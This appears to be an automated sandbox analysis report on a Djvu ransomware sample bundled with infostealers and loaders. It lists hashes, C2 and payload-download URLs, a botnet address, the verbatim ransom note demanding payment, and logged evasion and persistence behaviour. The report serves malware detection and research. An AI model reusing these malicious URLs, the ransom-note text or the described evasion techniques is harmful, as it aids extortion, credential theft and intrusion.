djvu | 7eb46cbaf93631a555e9d5318fddca520204eec37187f1328454441ca283cfb2

Analysis

max time kernel
51s
max time network
131s
platform
windows10-2004_x64
resource
win10v2004-20220310-en
submitted
12-03-2022 19:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7eb46cbaf93631a555e9d5318fddca520204eec37187f1328454441ca283cfb2.exe
Size

8.5MB
MD5

b6a3f9a04295ab0c8e47afb08197101e
SHA1

85029b81a0126d21c9727308ff5588eb0af8b5e9
SHA256

7eb46cbaf93631a555e9d5318fddca520204eec37187f1328454441ca283cfb2
SHA512

66ad4aacbabc1628e70416caa00da92a6b0dd1e71025123f60ca3918c0cc2fbf5b40a0821de007e2ae7466de96dd98b5273e0c035142b60b892e38931dc9ca25

Malware Config

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32

Extracted

Family

djvu

http://fuyt.org/test3/get.php

Attributes

extension
.xcbg
offline_id
y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1
payload_url
http://zerit.top/dl/build2.exe
http://fuyt.org/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0417Jsfkjn

rsa_pubkey.plain

Extracted

Family

redline

Botnet

ruzki12_03

176.122.23.55:11768

Attributes

auth_value
c51ddc8008e8581a01cec6e8291c5530

Signatures

Detected Djvu ransomware 5 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4380-289-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/4380-287-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/2252-288-0x00000000021D0000-0x00000000022EB000-memory.dmp	family_djvu
behavioral2/memory/4380-291-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/4380-300-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2844-173-0x0000000000400000-0x000000000371F000-memory.dmp	family_glupteba
behavioral2/memory/2844-174-0x0000000005810000-0x0000000006136000-memory.dmp	family_glupteba
behavioral2/memory/3184-202-0x0000000000400000-0x000000000371F000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rUNdlL32.eXe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4088 1348 rUNdlL32.eXe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4088	1348	rUNdlL32.eXe

RedLine Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1564-294-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

svchost.exe

description pid process target process

PID 1152 created 2844 1152 svchost.exe Info.exe
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

description	pid	process	target process
PID 1152 created 2844	1152	svchost.exe	Info.exe

OnlyLogger Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2280-264-0x00000000005E0000-0x0000000000624000-memory.dmp	family_onlylogger
behavioral2/memory/2280-269-0x0000000000400000-0x000000000048C000-memory.dmp	family_onlylogger

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Executes dropped EXE 38 IoCs

Processes:

Files.exeKRSetp.exejfiag3g_gg.exeInstall.exeFolder.exeInfo.exeInstallation.exeFolder.exepub2.exemysetold.exemd9_1sjm.exeComplete.exejfiag3g_gg.exeInfo.execsrss.exeEr0LRVqpAAre3RUKdr0AbLjh.exeWerFault.exeY3xgG0Ku2YL7jvWFr_C_lMSL.exef3ILg0ohBDYhwDd8XmudLTXB.exeConhost.exeWerFault.exeqgrZ4T3Y9t884pwPPSXlbZtd.exerundll32.exezGypfgWdUX9FLmVDCvxRTzRI.exetaskkill.exek0DbgLakP6JOtlVMKCk6k5oM.exefYl4lnIJ67L8Zoh6kixaMhmL.exebm3UC6bkNf0IcyjNSCbgK_aX.exeGauN2MbLc5iG_X1BC9N3DR23.exekCgCBPutcCX8cCKa9QdPwNw8.exeiJVfcQKzl4GP3F3mI2DUJYcU.exeWerFault.exeQ1VXnFC9tcEHkKRMyQDX70DJ.exeXU1oeoPOV0LVnPBA0aKAdCih.exe8DS88fSngpzKyrWWNkF0WWfc.execUN3RxYe388WHUs8bwLd19Nn.exeFAasYmbDLLX8yWYVymTYV7s8.exeInstall.exe

pid	process
3152	Files.exe
4656	KRSetp.exe
5108	jfiag3g_gg.exe
3872	Install.exe
4552	Folder.exe
2844	Info.exe
4352	Installation.exe
4868	Folder.exe
3968	pub2.exe
3960	mysetold.exe
3984	md9_1sjm.exe
4072	Complete.exe
4388	jfiag3g_gg.exe
3184	Info.exe
1112	csrss.exe
4868	Er0LRVqpAAre3RUKdr0AbLjh.exe
2824	WerFault.exe
4424	Y3xgG0Ku2YL7jvWFr_C_lMSL.exe
4692	f3ILg0ohBDYhwDd8XmudLTXB.exe
3876	Conhost.exe
4988	WerFault.exe
1244	qgrZ4T3Y9t884pwPPSXlbZtd.exe
2432	rundll32.exe
1676	zGypfgWdUX9FLmVDCvxRTzRI.exe
1484	taskkill.exe
4396	k0DbgLakP6JOtlVMKCk6k5oM.exe
60	fYl4lnIJ67L8Zoh6kixaMhmL.exe
2120	bm3UC6bkNf0IcyjNSCbgK_aX.exe
2252	GauN2MbLc5iG_X1BC9N3DR23.exe
2280	kCgCBPutcCX8cCKa9QdPwNw8.exe
3096	iJVfcQKzl4GP3F3mI2DUJYcU.exe
2260	WerFault.exe
4472	Q1VXnFC9tcEHkKRMyQDX70DJ.exe
1464	XU1oeoPOV0LVnPBA0aKAdCih.exe
2208	8DS88fSngpzKyrWWNkF0WWfc.exe
3560	cUN3RxYe388WHUs8bwLd19Nn.exe
3472	FAasYmbDLLX8yWYVymTYV7s8.exe
4132	Install.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\Documents\fYl4lnIJ67L8Zoh6kixaMhmL.exe	upx
C:\Users\Admin\Documents\fYl4lnIJ67L8Zoh6kixaMhmL.exe	upx

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
behavioral2/memory/3984-162-0x0000000000400000-0x0000000000759000-memory.dmp	vmprotect
C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe	vmprotect

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

rundll32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rundll32.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

7eb46cbaf93631a555e9d5318fddca520204eec37187f1328454441ca283cfb2.exeFolder.exek0DbgLakP6JOtlVMKCk6k5oM.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	7eb46cbaf93631a555e9d5318fddca520204eec37187f1328454441ca283cfb2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	Folder.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	k0DbgLakP6JOtlVMKCk6k5oM.exe

Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

3992 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
3992	rundll32.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Files.exeInfo.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex"	Files.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\LateWood = "\"C:\\Windows\\rss\\csrss.exe\""	Info.exe

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

rundll32.exemd9_1sjm.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	rundll32.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md9_1sjm.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

197 ipinfo.io
198 ipinfo.io
259 ipinfo.io
33 ipinfo.io
34 ipinfo.io
192 ipinfo.io
260 ipinfo.io
20 ip-api.com
201 ipinfo.io
215 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

flow	ioc
197	ipinfo.io
198	ipinfo.io
259	ipinfo.io
33	ipinfo.io
34	ipinfo.io
192	ipinfo.io
260	ipinfo.io
20	ip-api.com
201	ipinfo.io
215	ipinfo.io

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\mysetold.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\mysetold.exe	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

qgrZ4T3Y9t884pwPPSXlbZtd.exe

pid process

1244 qgrZ4T3Y9t884pwPPSXlbZtd.exe
Drops file in Windows directory 2 IoCs

Processes:

Info.exe

description ioc process

File opened for modification C:\Windows\rss Info.exe
File created C:\Windows\rss\csrss.exe Info.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
1244	qgrZ4T3Y9t884pwPPSXlbZtd.exe

description	ioc	process
File opened for modification	C:\Windows\rss	Info.exe
File created	C:\Windows\rss\csrss.exe	Info.exe

Program crash 26 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
3864	3992	WerFault.exe	rundll32.exe
4324	4692	WerFault.exe
1420	4424	WerFault.exe	Y3xgG0Ku2YL7jvWFr_C_lMSL.exe
4084	1676	WerFault.exe
492	4692	WerFault.exe
824	4424	WerFault.exe	Y3xgG0Ku2YL7jvWFr_C_lMSL.exe
2588	1676	WerFault.exe
4836	2280	WerFault.exe	kCgCBPutcCX8cCKa9QdPwNw8.exe
4116	2280	WerFault.exe	kCgCBPutcCX8cCKa9QdPwNw8.exe
2588	4380	WerFault.exe	GauN2MbLc5iG_X1BC9N3DR23.exe
4672	4472	WerFault.exe	Q1VXnFC9tcEHkKRMyQDX70DJ.exe
2824	2280	WerFault.exe	kCgCBPutcCX8cCKa9QdPwNw8.exe
2256	1464	WerFault.exe	XU1oeoPOV0LVnPBA0aKAdCih.exe
1984	2280	WerFault.exe	kCgCBPutcCX8cCKa9QdPwNw8.exe
2156	2208	WerFault.exe	8DS88fSngpzKyrWWNkF0WWfc.exe
4148	2280	WerFault.exe	kCgCBPutcCX8cCKa9QdPwNw8.exe
3568	4540	WerFault.exe	iowejrgv.exe
4864	4352	WerFault.exe	Installation.exe
4072	2280	WerFault.exe	kCgCBPutcCX8cCKa9QdPwNw8.exe
4116	2280	WerFault.exe	kCgCBPutcCX8cCKa9QdPwNw8.exe
1928	2280	WerFault.exe	kCgCBPutcCX8cCKa9QdPwNw8.exe
2824	2280	WerFault.exe	kCgCBPutcCX8cCKa9QdPwNw8.exe
4360	4472	WerFault.exe	Q1VXnFC9tcEHkKRMyQDX70DJ.exe
4336	4472	WerFault.exe	Q1VXnFC9tcEHkKRMyQDX70DJ.exe
4316	4472	WerFault.exe	Q1VXnFC9tcEHkKRMyQDX70DJ.exe
4916	4472	WerFault.exe	Q1VXnFC9tcEHkKRMyQDX70DJ.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

pub2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

2156 schtasks.exe
2336 schtasks.exe
4376 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

3196 timeout.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

788 tasklist.exe
4588 tasklist.exe
Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

5080 taskkill.exe
1484 taskkill.exe
4012 taskkill.exe

pid	process
2156	schtasks.exe
2336	schtasks.exe
4376	schtasks.exe

pid	process
3196	timeout.exe

pid	process
788	tasklist.exe
4588	tasklist.exe

pid	process
5080	taskkill.exe
1484	taskkill.exe
4012	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

Info.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2891 = "Sudan Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2592 = "Tocantins Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	Info.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pub2.exejfiag3g_gg.exe

pid	process
3968	pub2.exe
3968	pub2.exe
4388	jfiag3g_gg.exe
4388	jfiag3g_gg.exe
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
2776
